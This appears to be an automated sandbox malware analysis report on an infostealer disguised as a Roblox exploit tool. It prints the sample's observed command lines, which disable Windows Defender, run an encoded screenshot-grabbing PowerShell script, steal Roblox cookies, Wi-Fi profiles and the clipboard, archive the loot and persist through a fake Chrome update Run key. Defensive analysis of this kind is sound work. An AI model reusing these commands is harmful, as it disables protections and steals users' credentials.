Malware Analysis Report

2024-11-13 15:29

Sample ID 240606-svh22agh65
Target Arceus.rar
SHA256 0e05a9da73233d2173300ea096860d4e0320e71ad28bb3450fafa1ee82eefa2d
Tags
pyinstaller evasion execution upx
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

0e05a9da73233d2173300ea096860d4e0320e71ad28bb3450fafa1ee82eefa2d

Threat Level: Likely malicious

The file Arceus.rar was found to be: Likely malicious.

Malicious Activity Summary

pyinstaller evasion execution upx

Stops running service(s)

Command and Scripting Interpreter: PowerShell

Loads dropped DLL

UPX packed file

Executes dropped EXE

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Launches sc.exe

Detects Pyinstaller

Unsigned PE

Enumerates physical storage devices

Enumerates processes with tasklist

Modifies registry key

Delays execution with timeout.exe

Detects videocard installed

Suspicious use of WriteProcessMemory

Creates scheduled task(s)

Gathers system information

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-06 15:27

Signatures

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-06 15:26

Reported

2024-06-06 15:29

Platform

win10v2004-20240426-en

Max time kernel

0s

Max time network

37s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\main.pyc

Signatures

Enumerates physical storage devices

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\main.pyc

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp

Files

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-06 15:26

Reported

2024-06-06 15:29

Platform

win10v2004-20240508-en

Max time kernel

2s

Max time network

16s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ArceusX.exe"

Signatures

Stops running service(s)

evasion execution

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\_MEI15602\Build.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\ArceusX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ArceusX.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A ip-api.com N/A N/A
N/A api.ipify.org N/A N/A

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\ArceusX.exe

"C:\Users\Admin\AppData\Local\Temp\ArceusX.exe"

C:\Users\Admin\AppData\Local\Temp\ArceusX.exe

"C:\Users\Admin\AppData\Local\Temp\ArceusX.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\_MEI15602\Build.exe -pbeznogym

C:\Users\Admin\AppData\Local\Temp\_MEI15602\Build.exe

C:\Users\Admin\AppData\Local\Temp\_MEI15602\Build.exe -pbeznogym

C:\ProgramData\Microsoft\hacn.exe

"C:\ProgramData\Microsoft\hacn.exe"

C:\ProgramData\Microsoft\based.exe

"C:\ProgramData\Microsoft\based.exe"

C:\ProgramData\Microsoft\based.exe

"C:\ProgramData\Microsoft\based.exe"

C:\ProgramData\Microsoft\hacn.exe

"C:\ProgramData\Microsoft\hacn.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\_MEI41882\s.exe -pbeznogym

C:\Users\Admin\AppData\Local\Temp\_MEI41882\s.exe

C:\Users\Admin\AppData\Local\Temp\_MEI41882\s.exe -pbeznogym

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "start bound.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('An error was encountered during authentication. Please try again.', 0, 'Authentication Failed', 0+16);close()""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‏   .scr'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\ProgramData\main.exe

"C:\ProgramData\main.exe"

C:\Users\Admin\AppData\Local\Temp\bound.exe

bound.exe

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\ProgramData\svchost.exe

"C:\ProgramData\svchost.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show profile"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "systeminfo"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

C:\ProgramData\setup.exe

"C:\ProgramData\setup.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‏   .scr'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'

C:\Windows\system32\mshta.exe

mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('An error was encountered during authentication. Please try again.', 0, 'Authentication Failed', 0+16);close()"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="

C:\ProgramData\svchost.exe

"C:\ProgramData\svchost.exe"

C:\Windows\System32\Wbem\WMIC.exe

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "ver"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\netsh.exe

netsh wlan show profile

C:\Windows\system32\systeminfo.exe

systeminfo

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\kwvmipfo\kwvmipfo.cmdline"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7659.tmp" "c:\Users\Admin\AppData\Local\Temp\kwvmipfo\CSC6945134814D346A5ADF8DB291BB34457.TMP"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "getmac"

C:\Windows\system32\getmac.exe

getmac

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI47122\rar.exe a -r -hp"prometheus" "C:\Users\Admin\AppData\Local\Temp\aWoYa.zip" *"

C:\Users\Admin\AppData\Local\Temp\_MEI47122\rar.exe

C:\Users\Admin\AppData\Local\Temp\_MEI47122\rar.exe a -r -hp"prometheus" "C:\Users\Admin\AppData\Local\Temp\aWoYa.zip" *

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic os get Caption"

C:\Windows\System32\Wbem\WMIC.exe

wmic os get Caption

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp8107.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp8107.tmp.bat

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 3860"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe

"C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f

C:\Windows\system32\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

